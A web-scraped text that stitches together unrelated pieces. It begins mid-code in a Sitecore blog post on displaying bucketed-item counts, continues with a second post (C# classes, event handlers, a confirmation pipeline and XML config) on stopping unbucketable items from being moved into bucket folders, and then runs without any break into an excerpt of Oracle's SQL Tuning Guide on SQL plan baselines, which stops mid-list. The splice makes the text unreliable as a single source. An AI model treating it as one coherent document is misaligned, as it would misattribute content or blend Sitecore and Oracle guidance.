BucketedItemsCountProvider.GetBucketedItemsCount(itemBucket); } protected virtual Item GetCountDisplayNameItem(Item item, int count) { FieldList fields = new FieldList(); item.Fields.ReadAll(); foreach (Field field in item.Fields) { fields.Add(field.ID, field.Value); } int bucketedCount = GetBucketedItemsCount(item); string displayName = GetItemNameWithBucketedCount(item, bucketedCount); ItemDefinition itemDefinition = new ItemDefinition(item.ID, displayName, item.TemplateID, ID.Null); return new Item(item.ID, new ItemData(itemDefinition, item.Language, item.Version, fields), item.Database) { RuntimeSettings = { Temporary = true } }; } protected virtual string GetItemNameWithBucketedCount(Item item, int bucketedCount) { Assert.IsNotNull(SingularBucketedItemsDisplayNameFormat, "SingularBucketedItemsDisplayNameFormat must be set in configuration!"); Assert.IsNotNull(PluralBucketedItemsDisplayNameFormat, "PluralBucketedItemsDisplayNameFormat must be set in configuration!"); if (bucketedCount == 1) { return ReplaceTokens(SingularBucketedItemsDisplayNameFormat, item, bucketedCount); } return ReplaceTokens(PluralBucketedItemsDisplayNameFormat, item, bucketedCount); } protected virtual string ReplaceTokens(string format, Item item, int bucketedCount) { Assert.ArgumentNotNullOrEmpty(format, "format"); Assert.ArgumentNotNull(item, "item"); string replaced = format; replaced = replaced.Replace("$displayName", item.DisplayName); replaced = replaced.Replace("$bucketedCount", bucketedCount.ToString()); return replaced; } Database IDataViewBaseExtender.GetDatabase() { return GetDatabase(); } Item IDataViewBaseExtender.GetItemFromID(string id, Language language, Version version) { return GetItemFromID(id, language, version); } Item IDataViewBaseExtender.GetParentItem(Item item) { return GetParentItem(item); } bool IDataViewBaseExtender.HasChildren(Item item, string filter) { return HasChildren(item, filter); } void IDataViewBaseExtender.Initialize(string parameters) { Initialize(parameters); } bool IDataViewBaseExtender.IsAncestorOf(Item ancestor, Item item) { return IsAncestorOf(ancestor, item); } void IDataViewBaseExtender.SortItems(ArrayList children, string sortBy, bool sortAscending) { SortItems(children, sortBy, sortAscending); } } } You might be saying to yourself “Mike, what in the world is going on here?” 😉 Let me explain by starting with the GetChildItems() method. The GetChildItems() method is used to build up the collection of child Items that display in the Content Tree when you expand a parent node. It does this by populating the ItemCollection instance passed to it. The particular implementation above is delegating to the base class’ implementation to get the list of child Items for display in the Content Tree. If we should not show the Bucketed Items count — this is determined by the ShouldShowBucketedItemsCount() method which just returns the boolean value set on the ShowBucketedItemsCount property of the injected IBucketsContentEditorSettings instance — the code just exits. If we are to show the Bucketed Items count, we iterate over the ItemCollection collection and see if any of these child Items are Item Buckets — this is determined by the IsItemBucket() method. If we find an Item Bucket, we get its count of Bucketed Items via the GetBucketedItemsCount() method which delegates to the GetBucketedItemsCount() method on the injected IBucketedItemsCountProvider instance. 
Once we have the count, we call the GetCountDisplayNameItem() method which populates a FieldList collection with all of the fields defined on the Item Bucket; call the GetItemNameWithBucketedCount() method to get the new display name to show in the Content Tree — this method determines which display name format to use depending on whether we should use singular or pluralized messaging, and expands value on tokens via the ReplaceTokens() method — these tokens are defined in the patch configuration file below; creates an ItemDefinition instance so we can set the new display name; and returns a new Sitecore.Data.Items.Item instance to the caller. No, don’t worry, we aren’t adding a new Item in the content tree but creating a fake “wrapper” of the real one, and replacing this in the ItemCollection. We also have to fully implement the IDataViewBaseExtender interface. For most methods, I just delegate to the corresponding methods defined on the base class except for the IDataViewBaseExtender.GetChildItems() method which uses the GetChildItems() method defined above. I then bridged everything above together via the following patch configuration file: <configuration xmlns:patch="http://www.sitecore.net/xmlconfig/"> <sitecore> <buckets> <extendedCommands> <toggleBucketedItemsCountCommand type="Sitecore.Sandbox.Buckets.Shell.Framework.Commands.ToggleBucketedItemsCountCommand, Sitecore.Sandbox" singleInstance="on"> <BucketsContentEditorSettings ref="buckets/settings/bucketsContentEditorSettings" /> </toggleBucketedItemsCountCommand> </extendedCommands> <providers> <items> <bucketedItemsCountProvider type="Sitecore.Sandbox.Buckets.Providers.Items.BucketedItemsCountProvider, Sitecore.Sandbox" singleInstance="true"> <searchIndexMaps hint="raw:AddSearchIndexMap"> <searchIndexMap database="master" searchIndex="sitecore_master_index" /> <searchIndexMap database="web" searchIndex="sitecore_web_index" /> </searchIndexMaps> </bucketedItemsCountProvider> </items> </providers> <settings> <bucketsContentEditorSettings type="Sitecore.Sandbox.Buckets.Settings.BucketsContentEditorSettings, Sitecore.Sandbox" singleInstance="true"> <ItemBucketsFeatureDeterminer ref="determiners/features/itemBucketsFeatureDeterminer"/> <Registry ref="registries/registry" /> <ShowBucketedItemsCountRegistryKey>/Current_User/UserOptions.View.ShowBucketedItemsCount</ShowBucketedItemsCountRegistryKey> </bucketsContentEditorSettings> </settings> </buckets> <commands> <command name="contenteditor:togglebucketeditemscount" type="Sitecore.Sandbox.Shell.Framework.Commands.ExtendedConfigCommand, Sitecore.Sandbox" extendedCommandPath="buckets/extendedCommands/toggleBucketedItemsCountCommand" /> </commands> <contentSearch> <indexConfigurations> <defaultLuceneIndexConfiguration> <fieldMap> <fieldNames> <field fieldName="item_bucket_ancestor_id" storageType="YES" indexType="TOKENIZED" vectorType="NO" boost="1f" type="System.String" settingType="Sitecore.ContentSearch.LuceneProvider.LuceneSearchFieldConfiguration, Sitecore.ContentSearch.LuceneProvider"> <analyzer type="Sitecore.ContentSearch.LuceneProvider.Analyzers.LowerCaseKeywordAnalyzer, Sitecore.ContentSearch.LuceneProvider" /> </field> <field fieldName="is_bucketed" storageType="YES" indexType="TOKENIZED" vectorType="NO" boost="1f" type="System.Boolean" settingType="Sitecore.ContentSearch.LuceneProvider.LuceneSearchFieldConfiguration, Sitecore.ContentSearch.LuceneProvider" /> </fieldNames> </fieldMap> <documentOptions> <fields hint="raw:AddComputedIndexField"> <field 
fieldName="item_bucket_ancestor_id">Sitecore.Sandbox.Buckets.ContentSearch.ComputedFields.ItemBucketAncestorId, Sitecore.Sandbox</field> <field fieldName="is_bucketed">Sitecore.Sandbox.Buckets.ContentSearch.ComputedFields.IsBucketed, Sitecore.Sandbox</field> </fields> </documentOptions> </defaultLuceneIndexConfiguration> </indexConfigurations> </contentSearch> <dataviews> <dataview name="Master"> <patch:attribute name="assembly">Sitecore.Sandbox</patch:attribute> <patch:attribute name="type">Sitecore.Sandbox.Web.UI.HtmlControls.DataViews.ExtendedMasterDataView</patch:attribute> </dataview> </dataviews> <extendedDataViews> <extendedMasterDataView type="Sitecore.Sandbox.Buckets.Forms.BucketedItemsCountDataView, Sitecore.Sandbox" singleInstance="true"> <BucketsContentEditorSettings ref="buckets/settings/bucketsContentEditorSettings" /> <ItemBucketsFeatureMethods ref="buckets/methods/itemBucketsFeatureMethods" /> <BucketedItemsCountProvider ref="buckets/providers/items/bucketedItemsCountProvider" /> <SingularBucketedItemsDisplayNameFormat>$displayName &lt;span style="font-style: italic; color: blue;"&gt;($bucketedCount bucketed item)&lt;span&gt;</SingularBucketedItemsDisplayNameFormat> <PluralBucketedItemsDisplayNameFormat>$displayName &lt;span style="font-style: italic; color: blue;"&gt;($bucketedCount bucketed items)&lt;span&gt;</PluralBucketedItemsDisplayNameFormat> </extendedMasterDataView> </extendedDataViews> <registries> <registry type="Sitecore.Sandbox.Web.UI.HtmlControls.Registries.Registry, Sitecore.Sandbox" singleInstance="true" /> </registries> </sitecore> </configuration> bridge-collapse Let’s see this in action: bucketed-items-count-testing As you can see, it is working as intended. partay-hard Magical, right? magic Well, not really — it just appears that way. 😉 magic-not-really If you have any thoughts on this, please drop a comment. Prevent Unbucketable Sitecore Items from Being Moved to Bucket Folders If you’ve been reading my posts lately, you have probably noticed I’ve been having a ton of fun with Sitecore Item Buckets. I absolutely love this feature in Sitecore. As a matter of, I love Item Buckets so much, I’m doing a presentation on them just next week at the Greater Cincinnati Sitecore Users Group. If you’re in the neighborhood, stop by — even if it’s only to say “Hello”. Anyways, back to the post. I noticed the following grey box on the Items Buckets page on the Sitecore Documentation site: item-buckets-unbucketable-import This got me thinking: why can’t we build something in Sitecore to prevent this from happening in the first place? In other words, why can’t we just say “sorry, you can’t move an unbucketable Item into a bucket folder”? nope So, that’s what I decided to do — build a solution that prevents this from happening. Let’s have a look at what I came up with. 
I first created the following interface for classes whose instances will move a Sitecore Item to a destination Item: using Sitecore.Data.Items; namespace Sitecore.Sandbox.Utilities.Items.Movers { public interface IItemMover { bool DisableSecurity { get; set; } bool ShouldBeMoved(Item item, Item destination); void Move(Item item, Item destination); } } I then defined the following class which implements the interface above: using Sitecore.Data.Items; using Sitecore.Diagnostics; using Sitecore.SecurityModel; namespace Sitecore.Sandbox.Utilities.Items.Movers { public class ItemMover : IItemMover { public bool DisableSecurity { get; set; } public virtual bool ShouldBeMoved(Item item, Item destination) { return item != null && destination != null; } public virtual void Move(Item item, Item destination) { if (!ShouldBeMoved(item, destination)) { return; } if(DisableSecurity) { MoveWithoutSecurity(item, destination); return; } MoveWithSecurity(item, destination); } protected virtual void MoveWithSecurity(Item item, Item destination) { Assert.ArgumentNotNull(item, "item"); Assert.ArgumentNotNull(destination, "destination"); item.MoveTo(destination); } protected virtual void MoveWithoutSecurity(Item item, Item destination) { Assert.ArgumentNotNull(item, "item"); Assert.ArgumentNotNull(destination, "destination"); using (new SecurityDisabler()) { item.MoveTo(destination); } } } } Callers of the above code can move an Item from one location to another with/without Sitecore security in place. The ShouldBeMoved() method above is basically a stub that will allow subclasses to define their own rules on whether an Item should be moved, depending on whatever rules must be met. I then defined the following subclass of the class above which has its own rules on whether an Item should be moved (i.e. move this unbucketable Item out of a bucket folder if it makes its way there): using Sitecore.Data.Items; using Sitecore.Diagnostics; using Sitecore.Sandbox.Buckets.Util.Methods; using Sitecore.Sandbox.Utilities.Items.Movers; namespace Sitecore.Sandbox.Buckets.Util.Items.Movers { public class UnbucketableItemMover : ItemMover { protected IItemBucketsFeatureMethods ItemBucketsFeatureMethods { get; set; } public override bool ShouldBeMoved(Item item, Item destination) { return base.ShouldBeMoved(item, destination) && !IsItemBucketable(item) && IsItemInBucket(item) && !IsItemBucketFolder(item) && IsItemBucketFolder(item.Parent) && IsItemBucket(destination); } protected virtual bool IsItemBucketable(Item item) { EnsureItemBucketFeatureMethods(); Assert.ArgumentNotNull(item, "item"); return ItemBucketsFeatureMethods.IsItemBucketable(item); } protected virtual bool IsItemInBucket(Item item) { EnsureItemBucketFeatureMethods(); Assert.ArgumentNotNull(item, "item"); return ItemBucketsFeatureMethods.IsItemContainedWithinBucket(item); } protected virtual bool IsItemBucketFolder(Item item) { EnsureItemBucketFeatureMethods(); Assert.ArgumentNotNull(item, "item"); return ItemBucketsFeatureMethods.IsItemBucketFolder(item); } protected virtual bool IsItemBucket(Item item) { EnsureItemBucketFeatureMethods(); Assert.ArgumentNotNull(item, "item"); return ItemBucketsFeatureMethods.IsItemBucket(item); } protected virtual void EnsureItemBucketFeatureMethods() { Assert.IsNotNull(ItemBucketsFeatureMethods, "ItemBucketsFeatureMethods must be set in configuration!"); } } } I’m injecting an instance of an IItemBucketsFeatureMethods class — this interface and its implementation are defined in my previous post; go have a look if you have not read that post so you can be familiar with the IItemBucketsFeatureMethods code — via the Sitecore Configuration Factory. It contains common methods I am using in my Item Bucket code solutions (I will be using this in future posts). The ShouldBeMoved() method basically says that an Item can only be moved when the Item and destination passed aren’t null — this is defined on the base class’ ShouldBeMoved() method; the Item isn’t bucketable; the Item is already in an Item Bucket; the Item isn’t a Bucket Folder; the Item’s parent Item is a Bucket Folder; and the destination is an Item Bucket. Yes, the above sounds a bit confusing though there is a reason for it — I want to take an unbucketable Item out of a Bucket Folder and move it directly under the Item Bucket instead.
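Before hooking this up to events, the intended call pattern is simply the following sketch. The item and itemBucket variables stand in for whatever your caller provides, and the config path is hypothetical (the real one lives in the patch configuration file mentioned below):

using Sitecore.Configuration;
using Sitecore.Sandbox.Utilities.Items.Movers;

// Sketch of the intended flow: if an unbucketable Item was dropped into a
// Bucket Folder, relocate it directly under its ancestor Item Bucket.
// Move() re-checks ShouldBeMoved() internally, so the guard here is belt-and-braces.
IItemMover mover = Factory.CreateObject("buckets/movers/unbucketableItemMover", true) as IItemMover; // hypothetical path
if (mover.ShouldBeMoved(item, itemBucket))
{
    mover.Move(item, itemBucket);
}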
I then created the following class which contains methods that will serve as "item:moved" event handlers:

using System;
using System.Collections.Generic;
using Sitecore.Data;
using Sitecore.Data.Events;
using Sitecore.Data.Items;
using Sitecore.Events;
using Sitecore.Sandbox.Buckets.Util.Methods;
using Sitecore.Sandbox.Utilities.Items.Movers;

namespace Sitecore.Sandbox.Buckets.Events.Items.Move
{
    public class RemoveFromBucketFolderIfNotBucketableHandler
    {
        protected static SynchronizedCollection<ID> ItemsBeingProcessed { get; set; }

        protected IItemBucketsFeatureMethods ItemBucketsFeatureMethods { get; set; }

        protected IItemMover UnbucketableItemMover { get; set; }

        static RemoveFromBucketFolderIfNotBucketableHandler()
        {
            ItemsBeingProcessed = new SynchronizedCollection<ID>();
        }

        protected void OnItemMoved(object sender, EventArgs args)
        {
            Item item = GetItem(args);
            RemoveFromBucketFolderIfNotBucketable(item);
        }

        protected virtual Item GetItem(EventArgs args)
        {
            if (args == null)
            {
                return null;
            }

            return Event.ExtractParameter(args, 0) as Item;
        }

        protected void OnItemMovedRemote(object sender, EventArgs args)
        {
            Item item = GetItemRemote(args);
            RemoveFromBucketFolderIfNotBucketable(item);
        }

        protected virtual Item GetItemRemote(EventArgs args)
        {
            ItemMovedRemoteEventArgs remoteArgs = args as ItemMovedRemoteEventArgs;
            if (remoteArgs == null)
            {
                return null;
            }

            return remoteArgs.Item;
        }

        protected virtual void RemoveFromBucketFolderIfNotBucketable(Item item)
        {
            if (item == null)
            {
                return;
            }

            // Skip Items that are already mid-move so the handler is not re-entered
            // for the move it triggers itself.
            if (IsItemBeingProcessed(item))
            {
                return;
            }

            Item itemBucket = GetItemBucket(item);
            if (itemBucket == null)
            {
                return;
            }

            if (!ShouldBeMoved(item, itemBucket))
            {
                return;
            }

            AddItemBeingProcessed(item);
            MoveUnderItemBucket(item, itemBucket);
            RemoveItemBeingProcessed(item);
        }

        protected virtual bool IsItemBeingProcessed(Item item)
        {
            if (item == null)
            {
                return false;
            }

            return ItemsBeingProcessed.Contains(item.ID);
        }

        protected virtual void AddItemBeingProcessed(Item item)
        {
            if (item == null)
            {
                return;
            }

            ItemsBeingProcessed.Add(item.ID);
        }

        protected virtual void RemoveItemBeingProcessed(Item item)
        {
            if (item == null)
            {
                return;
            }

            ItemsBeingProcessed.Remove(item.ID);
        }

        protected virtual Item GetItemBucket(Item item)
        {
            if (ItemBucketsFeatureMethods == null || item == null)
            {
                return null;
            }

            return ItemBucketsFeatureMethods.GetItemBucket(item);
        }

        protected virtual bool ShouldBeMoved(Item item, Item itemBucket)
        {
            if (UnbucketableItemMover == null)
            {
                return false;
            }

            return UnbucketableItemMover.ShouldBeMoved(item, itemBucket);
        }

        protected virtual void MoveUnderItemBucket(Item item, Item itemBucket)
        {
            if (UnbucketableItemMover == null)
            {
                return;
            }

            UnbucketableItemMover.Move(item, itemBucket);
        }
    }
}

Both the OnItemMoved() and OnItemMovedRemote() methods extract the moved Item from the EventArgs instance using their own specific getter methods. If that Item is null, the code exits. Both methods pass their Item instance to the RemoveFromBucketFolderIfNotBucketable() method, which ultimately attempts to grab an Item Bucket ancestor of the Item via the GetItemBucket() method. If no Item Bucket instance is returned, the code exits. If an Item Bucket was found, the RemoveFromBucketFolderIfNotBucketable() method ascertains whether the Item should be moved — it makes a call to the ShouldBeMoved() method, which just delegates to the IItemMover instance injected in via the Sitecore Configuration Factory (have a look at the patch configuration file below). If the Item should not be moved, then the code exits.
If it should be moved, it is then passed to the MoveUnderItemBucket() method, which delegates to the Move() method on the IItemMover instance.

You might be asking "Mike, what's up with the ItemsBeingProcessed SynchronizedCollection of Item IDs?" I'm using this collection to track which Items are currently being moved so we don't have race conditions in the code.

You might be thinking "Great, we're done!" No — we can't just move an Item from one destination to another, especially when the user selected the first destination. We should let the user know that we will need to move the Item as it is unbucketable. Let's not be evil.

I created the following class whose Process() method will serve as a custom processor for both the <uiDragItemTo> and <uiMoveItems> pipelines of the Sitecore Client:

using System;
using System.Collections.Generic;
using System.Linq;
using Sitecore.Configuration;
using Sitecore.Data;
using Sitecore.Data.Items;
using Sitecore.Diagnostics;
using Sitecore.Text;
using Sitecore.Web.UI.Sheer;
using Sitecore.Sandbox.Buckets.Util.Methods;

namespace Sitecore.Sandbox.Buckets.Shell.Framework.Pipelines.MoveItems
{
    public class ConfirmMoveOfUnbucketableItem
    {
        protected string ItemIdsParameterName { get; set; }

        protected IItemBucketsFeatureMethods ItemBucketsFeatureMethods { get; set; }

        protected string ConfirmationMessageFormat { get; set; }

        public void Process(ClientPipelineArgs args)
        {
            Assert.ArgumentNotNull(args, "args");
            IEnumerable<string> itemIds = GetItemIds(args);
            if (itemIds == null || !itemIds.Any() || itemIds.Count() > 1)
            {
                return;
            }

            string targetId = GetTargetId(args);
            if (string.IsNullOrWhiteSpace(targetId))
            {
                return;
            }

            Database database = GetDatabase(args);
            if (database == null)
            {
                return;
            }

            Item targetItem = GetItem(database, targetId);
            if (targetItem == null || !IsItemBucketOrIsItemInBucket(targetItem))
            {
                return;
            }

            Item item = GetItem(database, itemIds.First());
            if (item == null || IsItemBucketable(item))
            {
                return;
            }

            Item itemBucket = GetItemBucket(targetItem);
            if (itemBucket == null)
            {
                return;
            }

            SetTokenValues(args, item, itemBucket);
            ConfirmMove(args);
        }

        protected virtual IEnumerable<string> GetItemIds(ClientPipelineArgs args)
        {
            Assert.ArgumentNotNull(args, "args");
            Assert.ArgumentNotNull(args.Parameters, "args.Parameters");
            string itemIds = GetItemIdsParameterName(args);
            Assert.IsNotNullOrEmpty(itemIds, "GetItemIdsParameterName() cannot return null or the empty string!");
            return new ListString(itemIds, '|');
        }

        protected virtual string GetItemIdsParameterName(ClientPipelineArgs args)
        {
            Assert.IsNotNullOrEmpty(ItemIdsParameterName, "ItemIdsParameterName must be set in configuration!");
            Assert.ArgumentNotNull(args, "args");
            Assert.ArgumentNotNull(args.Parameters, "args.Parameters");
            return args.Parameters[ItemIdsParameterName];
        }

        protected virtual string GetTargetId(ClientPipelineArgs args)
        {
            Assert.ArgumentNotNull(args, "args");
            Assert.ArgumentNotNull(args.Parameters, "args.Parameters");
            return args.Parameters["target"];
        }

        protected virtual Database GetDatabase(ClientPipelineArgs args)
        {
            Assert.ArgumentNotNull(args, "args");
            Assert.ArgumentNotNull(args.Parameters, "args.Parameters");
            return Factory.GetDatabase(args.Parameters["database"]);
        }

        protected virtual Item GetItem(Database database, string itemId)
        {
            Assert.ArgumentNotNull(database, "database");
            Assert.ArgumentNotNullOrEmpty(itemId, "itemId");
            try
            {
                return database.GetItem(itemId);
            }
            catch (Exception ex)
            {
                Log.Error(ToString(), ex, this);
            }

            return null;
        }
        protected virtual bool IsItemBucketOrIsItemInBucket(Item item)
        {
            EnsureItemBucketsFeatureMethods();
            Assert.ArgumentNotNull(item, "item");
            return IsItemBucket(item) || IsItemInBucket(item);
        }

        protected virtual bool IsItemBucket(Item item)
        {
            EnsureItemBucketsFeatureMethods();
            Assert.ArgumentNotNull(item, "item");
            return ItemBucketsFeatureMethods.IsItemBucket(item);
        }

        protected virtual bool IsItemInBucket(Item item)
        {
            EnsureItemBucketsFeatureMethods();
            Assert.ArgumentNotNull(item, "item");
            return ItemBucketsFeatureMethods.IsItemContainedWithinBucket(item);
        }

        protected virtual bool IsItemBucketable(Item item)
        {
            EnsureItemBucketsFeatureMethods();
            Assert.ArgumentNotNull(item, "item");
            return ItemBucketsFeatureMethods.IsItemBucketable(item);
        }

        protected virtual Item GetItemBucket(Item item)
        {
            EnsureItemBucketsFeatureMethods();
            Assert.ArgumentNotNull(item, "item");
            if (!ItemBucketsFeatureMethods.IsItemBucket(item))
            {
                return ItemBucketsFeatureMethods.GetItemBucket(item);
            }

            return item;
        }

        protected virtual void SetTokenValues(ClientPipelineArgs args, Item item, Item itemBucket)
        {
            Assert.ArgumentNotNull(args, "args");
            Assert.ArgumentNotNull(args.Parameters, "args.Parameters");
            Assert.ArgumentNotNull(item, "item");
            Assert.ArgumentNotNull(itemBucket, "itemBucket");
            args.Parameters["$itemName"] = item.Name;
            args.Parameters["$itemBucketName"] = itemBucket.Name;
            args.Parameters["$itemBucketFullPath"] = itemBucket.Paths.FullPath;
        }

        protected virtual void ConfirmMove(ClientPipelineArgs args)
        {
            Assert.ArgumentNotNull(args, "args");
            if (args.IsPostBack)
            {
                if (args.Result == "yes")
                {
                    ClearResult(args);
                    return;
                }

                if (args.Result == "no")
                {
                    args.AbortPipeline();
                    return;
                }
            }
            else
            {
                SheerResponse.Confirm(GetConfirmationMessage(args));
                args.WaitForPostBack();
            }
        }

        protected virtual void ClearResult(ClientPipelineArgs args)
        {
            args.Result = string.Empty;
            args.IsPostBack = false;
        }

        protected virtual string GetConfirmationMessage(ClientPipelineArgs args)
        {
            Assert.IsNotNullOrEmpty(ConfirmationMessageFormat, "ConfirmationMessageFormat must be set in configuration!");
            Assert.ArgumentNotNull(args, "args");
            return ReplaceTokens(ConfirmationMessageFormat, args);
        }

        protected virtual string ReplaceTokens(string messageFormat, ClientPipelineArgs args)
        {
            Assert.ArgumentNotNullOrEmpty(messageFormat, "messageFormat");
            Assert.ArgumentNotNull(args, "args");
            Assert.ArgumentNotNull(args.Parameters, "args.Parameters");
            string message = messageFormat;
            message = message.Replace("$itemName", args.Parameters["$itemName"]);
            message = message.Replace("$itemBucketName", args.Parameters["$itemBucketName"]);
            message = message.Replace("$itemBucketFullPath", args.Parameters["$itemBucketFullPath"]);
            return message;
        }

        protected virtual void EnsureItemBucketsFeatureMethods()
        {
            Assert.IsNotNull(ItemBucketsFeatureMethods, "ItemBucketsFeatureMethods must be set in configuration!");
        }
    }
}

The Process() method above gets the Item ID for the Item that is being moved; gets the Item ID for the destination Item — this is referred to as the "target" in the code above; gets the Database instance of where we are moving this Item; gets the instances of both the Item and target Item; determines whether the target Item is an Item Bucket or lives within one; determines whether the Item is unbucketable; and then gets the Item Bucket (this could be the target Item itself). If any of the instances above are null, the code exits.
If the Item is unbucketable but is being moved to a Bucket Folder or Item Bucket, we prompt the user with a confirmation dialog asking whether they would like to continue, given that the Item will be moved directly under the Item Bucket. If the user clicks the 'OK' button, the Item is moved. Otherwise, the pipeline is aborted and the Item will not be moved at all.

I then pieced all of the above together via the following patch configuration file:

<configuration xmlns:patch="http://www.sitecore.net/xmlconfig/">
  <sitecore>
    <buckets>
      <movers>
        <items>
          <unbucketableItemMover type="Sitecore.Sandbox.Buckets.Util.Items.Movers.UnbucketableItemMover, Sitecore.Sandbox" singleInstance="true">
            <DisableSecurity>true</DisableSecurity>
            <ItemBucketsFeatureMethods ref="buckets/methods/itemBucketsFeatureMethods" />
          </unbucketableItemMover>
        </items>
      </movers>
    </buckets>
    <events>
      <event name="item:moved">
        <handler type="Sitecore.Sandbox.Buckets.Events.Items.Move.RemoveFromBucketFolderIfNotBucketableHandler, Sitecore.Sandbox" method="OnItemMoved">
          <ItemBucketsFeatureMethods ref="buckets/methods/itemBucketsFeatureMethods" />
          <UnbucketableItemMover ref="buckets/movers/items/unbucketableItemMover" />
        </handler>
      </event>
      <event name="item:moved:remote">
        <handler type="Sitecore.Sandbox.Buckets.Events.Items.Move.RemoveFromBucketFolderIfNotBucketableHandler, Sitecore.Sandbox" method="OnItemMovedRemote">
          <ItemBucketsFeatureMethods ref="buckets/methods/itemBucketsFeatureMethods" />
          <UnbucketableItemMover ref="buckets/movers/items/unbucketableItemMover" />
        </handler>
      </event>
    </events>
    <processors>
      <uiDragItemTo>
        <processor patch:before="processor[@type='Sitecore.Buckets.Pipelines.UI.ItemDrag, Sitecore.Buckets' and @method='Execute']"
                   type="Sitecore.Sandbox.Buckets.Shell.Framework.Pipelines.MoveItems.ConfirmMoveOfUnbucketableItem, Sitecore.Sandbox" mode="on">
          <ItemIdsParameterName>id</ItemIdsParameterName>
          <ItemBucketsFeatureMethods ref="buckets/methods/itemBucketsFeatureMethods" />
          <ConfirmationMessageFormat>You are attempting to move the non-bucketable Item: $itemName to a bucket folder. If you continue, it will be moved directly under the Item Bucket: $itemBucketName ($itemBucketFullPath). Do you wish to continue?</ConfirmationMessageFormat>
        </processor>
      </uiDragItemTo>
      <uiMoveItems>
        <processor patch:before="processor[@type='Sitecore.Buckets.Pipelines.UI.ItemMove, Sitecore.Buckets' and @method='Execute']"
                   type="Sitecore.Sandbox.Buckets.Shell.Framework.Pipelines.MoveItems.ConfirmMoveOfUnbucketableItem, Sitecore.Sandbox" mode="on">
          <ItemIdsParameterName>items</ItemIdsParameterName>
          <ItemBucketsFeatureMethods ref="buckets/methods/itemBucketsFeatureMethods" />
          <ConfirmationMessageFormat>You are attempting to move the non-bucketable Item: $itemName to a bucket folder. If you continue, it will be moved directly under the Item Bucket: $itemBucketName ($itemBucketFullPath). Do you wish to continue?</ConfirmationMessageFormat>
        </processor>
      </uiMoveItems>
    </processors>
  </sitecore>
</configuration>

Let's see how we did. I moved this unbucketable Item to an Item Bucket, and confirmed the standard move prompt. Yes, I'm sure I'm sure. I was then prompted with the confirmation dialog as expected, and as you can see, the Item was placed directly under the Item Bucket.

If you have any thoughts on this, please drop a comment. That's all, folks!
Oracle® Database SQL Tuning Guide
12c Release 1 (12.1)
E15858-15

23 Managing SQL Plan Baselines

This chapter explains the concepts and tasks relating to SQL plan management using the DBMS_SPM package.

23.1 About SQL Plan Management

SQL plan management is a preventative mechanism that enables the optimizer to automatically manage execution plans, ensuring that the database uses only known or verified plans. In this context, a plan includes all plan-related information (for example, SQL plan identifier, set of hints, bind values, and optimizer environment) that the optimizer needs to reproduce an execution plan.

SQL plan management uses a mechanism called a SQL plan baseline. A plan baseline is a set of accepted plans that the optimizer is allowed to use for a SQL statement. In the typical use case, the database accepts a plan into the plan baseline only after verifying that the plan performs well.

The main components of SQL plan management are as follows:

• Plan capture

  This component stores relevant information about plans for a set of SQL statements. See "Plan Capture".

• Plan selection

  This component is the detection by the optimizer of plan changes based on stored plan history, and the use of SQL plan baselines to select appropriate plans to avoid potential performance regressions. See "Plan Selection".

• Plan evolution

  This component is the process of adding new plans to existing SQL plan baselines, either manually or automatically. See "Plan Evolution".

23.1.1 Purpose of SQL Plan Management

The primary goal of SQL plan management is to prevent performance regressions caused by plan changes. A secondary goal is to gracefully adapt to changes such as new optimizer statistics or indexes by verifying and accepting only plan changes that improve performance.

Note: SQL plan baselines cannot help when an event has caused irreversible execution plan changes, such as dropping an index.

23.1.1.1 Benefits of SQL Plan Management

Typical scenarios in which SQL plan management can improve or preserve SQL performance include:

• A database upgrade that installs a new optimizer version usually results in plan changes for a small percentage of SQL statements. Most plan changes result in either improvement or no performance change. However, some plan changes may cause performance regressions. SQL plan baselines significantly minimize potential regressions resulting from an upgrade.

  When you upgrade, the database only uses plans from the plan baseline. The database puts new plans that are not in the current baseline into a holding area, and later evaluates them to determine whether they use fewer resources than the current plan in the baseline. If the plans perform better, then the database promotes them into the baseline; otherwise, the database does not promote them.

• Ongoing system and data changes can affect plans for some SQL statements, potentially causing performance regressions. SQL plan baselines help minimize performance regressions and stabilize SQL performance.

• Deployment of new application modules introduces new SQL statements into the database.
  The application software may use appropriate SQL execution plans developed in a standard test configuration for the new statements. If the system configuration is significantly different from the test configuration, then the database can evolve SQL plan baselines over time to produce better performance.

See Also: Oracle Database Upgrade Guide to learn how to upgrade an Oracle database

23.1.1.2 Differences Between SQL Plan Baselines and SQL Profiles

Both SQL profiles and SQL plan baselines help improve the performance of SQL statements by ensuring that the optimizer uses only optimal plans. Both profiles and baselines are internally implemented using hints (see "About Optimizer Hints"). However, these mechanisms have the following significant differences:

• In general, SQL plan baselines are proactive, whereas SQL profiles are reactive.

  Typically, you create SQL plan baselines before significant performance problems occur. SQL plan baselines prevent the optimizer from using suboptimal plans in the future.

  The database creates SQL profiles when you invoke SQL Tuning Advisor, which you typically do only after a SQL statement has shown high-load symptoms. SQL profiles are primarily useful for providing the ongoing resolution of optimizer mistakes that have led to suboptimal plans. Because the SQL profile mechanism is reactive, it cannot guarantee stable performance as drastic database changes occur.

  The following graphic illustrates the difference:

  [Graphic: tgsql_vm_028.png]

• SQL plan baselines reproduce a specific plan, whereas SQL profiles correct optimizer cost estimates.

  A SQL plan baseline is a set of accepted plans. Each plan is implemented using a set of outline hints that fully specify a particular plan. SQL profiles are also implemented using hints, but these hints do not specify any specific plan. Rather, the hints correct miscalculations in the optimizer estimates that lead to suboptimal plans. For example, a hint may correct the cardinality estimate of a table.

  Because a profile does not constrain the optimizer to any one plan, a SQL profile is more flexible than a SQL plan baseline. For example, changes in initialization parameters and optimizer statistics allow the optimizer to choose a better plan.

Oracle recommends that you use SQL Tuning Advisor. In this way, you follow the recommendations made by the advisor for SQL profiles and plan baselines rather than trying to determine which mechanism is best for each SQL statement.

23.1.2 Plan Capture

SQL plan capture refers to techniques for capturing and storing relevant information about plans in the SQL Management Base for a set of SQL statements. Capturing a plan means making SQL plan management aware of this plan. You can configure initial plan capture to occur automatically by setting an initialization parameter, or you can capture plans manually by using the DBMS_SPM package.

23.1.2.1 Automatic Initial Plan Capture

You enable automatic initial plan capture by setting the initialization parameter OPTIMIZER_CAPTURE_SQL_PLAN_BASELINES to true (the default is false). When enabled, the database automatically creates a SQL plan baseline for any repeatable SQL statement executed on the database.
If automatic initial plan capture is enabled, and if the database executes a repeatable SQL statement, then the capture algorithm is as follows:

• If a SQL plan baseline does not exist, then the optimizer creates a plan history and SQL plan baseline for the statement, marking the initial plan for the statement as accepted and adding it to the SQL plan baseline.

• If a SQL plan baseline exists, then the optimizer behavior depends on the cost-based plan derived at parse time:

  • If this plan does not match a plan in the SQL plan baseline, then the optimizer marks the new plan as unaccepted and adds it to the SQL plan baseline.

